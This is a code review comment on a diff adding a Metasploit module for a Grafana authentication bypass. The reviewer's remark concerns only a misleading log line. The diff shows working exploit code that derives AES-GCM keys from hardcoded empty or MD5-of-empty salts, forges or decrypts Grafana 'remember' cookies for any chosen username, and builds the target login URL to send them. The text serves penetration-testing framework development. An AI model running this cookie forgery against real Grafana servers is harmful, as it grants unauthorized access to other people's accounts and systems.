modules/auxiliary/admin/http/grafana_auth_bypass.py

```diff
@@ -0,0 +1,175 @@
+    ct = aesgcm.encrypt(nonce, username, None)
+    cookie = str(binascii.hexlify(nonce),'ascii')+str(binascii.hexlify(ct),'ascii')
+    return cookie
+
+
+def decrypt_version5(cookie):
+    
+    salt = b''
+    iterations = 1000
+    key = hashlib.pbkdf2_hmac('sha256', salt, salt, iterations, 16)
+    aesgcm = AESGCM(key)
+    nonce = binascii.unhexlify(cookie[:24])
+    ct = binascii.unhexlify(cookie[24:len(cookie)])
+    username = str(aesgcm.decrypt(nonce, ct, None),'ascii')
+    return username
+
+
+def decrypt_version4(cookie):
+
+    salt = hashlib.md5(''.encode("utf-8")).hexdigest().encode()
+    iterations = 1000
+    key = hashlib.pbkdf2_hmac('sha256', salt, salt, iterations, 16)
+    aesgcm = AESGCM(key)
+    nonce = binascii.unhexlify(cookie[:24])
+    ct = binascii.unhexlify(cookie[24:len(cookie)])
+    username = str(aesgcm.decrypt(nonce, ct, None),'ascii')
+    return username
+
+
+
+
+def run(args):
+   
+
+    if int(args['VERSION']) == 5:
+        try:    
+            username = args['USERNAME']
+            cookie = encrypt_version5(args['USERNAME'])
+            module.log("Encrypted remember cookie: "+cookie, "good")
+        except:
+            module.log("No username set, trying to decrypt it from cookie.", "warning")
+            try:
+                username = decrypt_version5(args['COOKIE'])
+                module.log("Decrypted username: "+username, "good")
+                cookie = args['COOKIE']
+            except:
+                module.log("Unable to set username", "error")
+                return
+    elif int(args['VERSION']) <= 4 and int(args['VERSION']) >= 2:
+        try:    
+            username = args['USERNAME']
+            cookie = encrypt_version4(args['USERNAME'])
+            module.log("Encrypted remember cookie: "+cookie, "good")
+        except:
+            module.log("No username set, trying to decrypt it from cookie.", "warning")
+            try:
+                username = decrypt_version4(args['COOKIE'])
+                module.log("Decrypted username: "+username, "good")
+                cookie = args['COOKIE']
+            except:
+                module.log("Unable to set username", "error")
+                return
+    else:
+        module.log("Version not supported.","error")
+
+
+    try:
+        cookies = { 'grafana_remember':cookie, 'grafana_user':username }
+        
+        if args['SSL'] == "false":
+            if args['BASEURL'].endswith('/'): 
+                url="http://"+args['RHOSTS']+":"+args['RPORT']+args['BASEURL']+"login/"
+            else:
+                url="http://"+args['RHOSTS']+":"+args['RPORT']+args['BASEURL']+"/login/"
+        elif args['SSL'] == "true":
+            if args['BASEURL'].endswith('/'): 
+                url="https://"+args['RHOSTS']+":"+args['RPORT']+args['BASEURL']+"login/"
+            else:
+                url="https://"+args['RHOSTS']+":"+args['RPORT']+args['BASEURL']+"/login/"
+        module.log(url, "error")
```

Comment:
This isn't particularly useful. It just logs an error message with the URL which from a users perspective is confusing. It might lead them to believe the URL is incorrect or something to that effect. I'd either remove it, or make it something meaningful like `module.log('Targeting URL: ' + url, 'debug')`